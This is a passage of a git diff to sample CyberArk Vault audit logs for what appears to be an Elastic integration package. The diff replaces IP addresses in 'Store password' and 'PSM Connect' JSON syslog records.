09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} +<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} <5>1 2021-03-10T23:39:25Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 15:39:25","IsoTimestamp":"2021-03-10T23:39:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountB"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"24"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615419536"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614868762"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"2"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-14T11:48:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 04:48:26\n 2021-03-14T11:48:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Groups\\WindowsGroup\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 04:48:26","IsoTimestamp":"2021-03-14T11:48:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615722505"},{"Name":"CurrInd","Value":"2"}]}}}} <5>1 2021-03-15T10:12:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:21\n 2021-03-15T10:12:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:21","IsoTimestamp":"2021-03-15T10:12:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"27"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615754905"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1615231204"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} -<5>1 2021-03-15T13:13:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:13:01\n 2021-03-15T13:13:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n Administrator\n Store password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 127.0.0.1\n \n \n \n \n \n Store password\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:13:01","IsoTimestamp":"2021-03-15T13:13:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:13:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:13:01\n 2021-03-15T13:13:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n Administrator\n Store password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 127.0.0.1\n \n \n \n \n \n Store password\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:13:01","IsoTimestamp":"2021-03-15T13:13:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/300_psm_connect.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/300_psm_connect.log index 74928df0a23..ce2f13e9d7d 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/300_psm_connect.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/300_psm_connect.log @@ -1,17 +1,17 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"300","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n 